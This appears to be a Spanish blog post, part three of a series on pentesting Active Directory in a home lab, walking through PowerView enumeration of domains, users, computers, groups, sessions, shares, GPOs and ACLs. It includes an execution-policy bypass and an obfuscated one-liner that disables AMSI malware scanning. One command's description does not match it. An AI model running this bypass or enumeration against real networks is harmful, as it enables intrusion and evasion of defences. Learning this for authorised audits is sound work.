Buscar

05 julio 2021

Pentesting on AD parte III

Vamos a ir completando la "saga" de Pentesting en Directorio Activo. Si aún no has leído las partes I y II, te recomiendo que le eches un vistazo.

Si quieres aprender más sobre como realizar auditorías en empresas con AD. Sigue leyendo.

Vamos a estar realizando la parte de enumeración en Active Directory con la herramienta  PowerView escrita en PowerShell y que forma parte de PowerSploit desarrollada por Will Schroeder.

Estaremos utilizando un laboratorio en el que se simula lo que podríamos encontrar en un entorno empresarial, en concreto el que crea S4vitar (gracias, majo) en su canal de YouTube, el cual deberías ver encarecidamente.

Este laboratorio está formado por un Windows Server 2016, que es el DC, y por 2 equipos con Windows 10 que están unidos a este DC.

Comenzamos sabiendo que hemos ganado acceso al DC (Windows Server 2016) y que estamos con una cuenta no privilegiada. Vamos a descargarnos el script desde su GitHub.

Una vez tenemos el script en el equipo, abrimos una consola de PowerShell y escribimos lo siguiente:

powershell -ep bypass

Bypasseamos AMSI:

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Ejecutamos:

    . .\PowerView.ps1


Ya tenemos PowerView cargado, vamos a empezar con la enumeración. Lo primero que podemos hacer es ver el dominio actual, usando:

Get-NetDomain


Otra forma de ver datos sobre el dominio es con:

Get-NetDomainController


Algo interesante que podemos ver, son las políticas que se han definido en el DC:

Get-DomainPolicy


Des esta forma, estamos obteniendo información (entre otras cosas) sobre la complejidad de la contraseña o su tiempo de vida.

Vamos a listar los usuarios del dominio usando:


Lo que he marcado en rojo es un poco Fast & Furious (fantasma), dudo que dejen la contraseña, pero quizá si una descripción que nos valga para algo.

También podemos listar los equipos del DC:

Get-NetComputer


Podemos enumerar por el nombre de los sistemas operativos más comunes:

 Get-NetComputer –OperatingSystem "Windows 10 Enterprise Evaluation"


Esto mismo se podría hacer buscando por "Windows 7 Ultimate" o cualquier otro.

Podemos saber los equipos que están encendidos en la red utilizando:

Get-NetComputer -Ping


Veamos los grupos con:

Get-NetGroup


Podemos hacer esto mismo pero filtrando por el que nos interese (admin):

Get-NetGroup *admin*


Para ver el listado de los administradores locales de un equipo usamos:

 Get-NetLocalGroup –ComputerName PC-Roberto


Si quieres ver que usuarios están logados en un equipo concreto:

Get-NetLoggedon –ComputerName PC-Roberto


Para enumerar los recursos compartidos en el dominio (ojo, que puede tardar un poco):

Invoke-ShareFinder


Vamos con la enumeración de GPO.

Para ver las GPO de un equipo concreto:

Get-NetGPO -ComputerName PC-Roberto


Para ver las Unidades Organizativas (OU) en el dominio:

Get-NetOU


Para buscar todas las máquinas en el dominio actual donde el usuario actual tiene acceso de administrador local:

Get-NetDomainTrust


Para encontrar administradores locales en todas las máquinas del dominio

Invoke-EnumerateLocalAdmin


Para ver los administradores de dominio que han iniciado sesión en los equipos y la IP de estos:

Invoke-UserHunter -ShowAll -verbose


Pasemos ahora a la enumeración de ACL:

Con el siguiente comando podemos unumeras las ACLs para el grupo administradores:

Get-ObjectAcl -SamAccountName "administradores" -ResolveGUIDs


Se Utiliza este comando para ver si algún usuario tiene permisos de modificación en una GPO:

Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}


Aún faltan cosas, lo sé, pero esta entrada ya es enorme y prefiero hacer una cuarta parte hablando más sobre el tema.

Nos vemos en la siguiente.

0 comentarios:

Publicar un comentario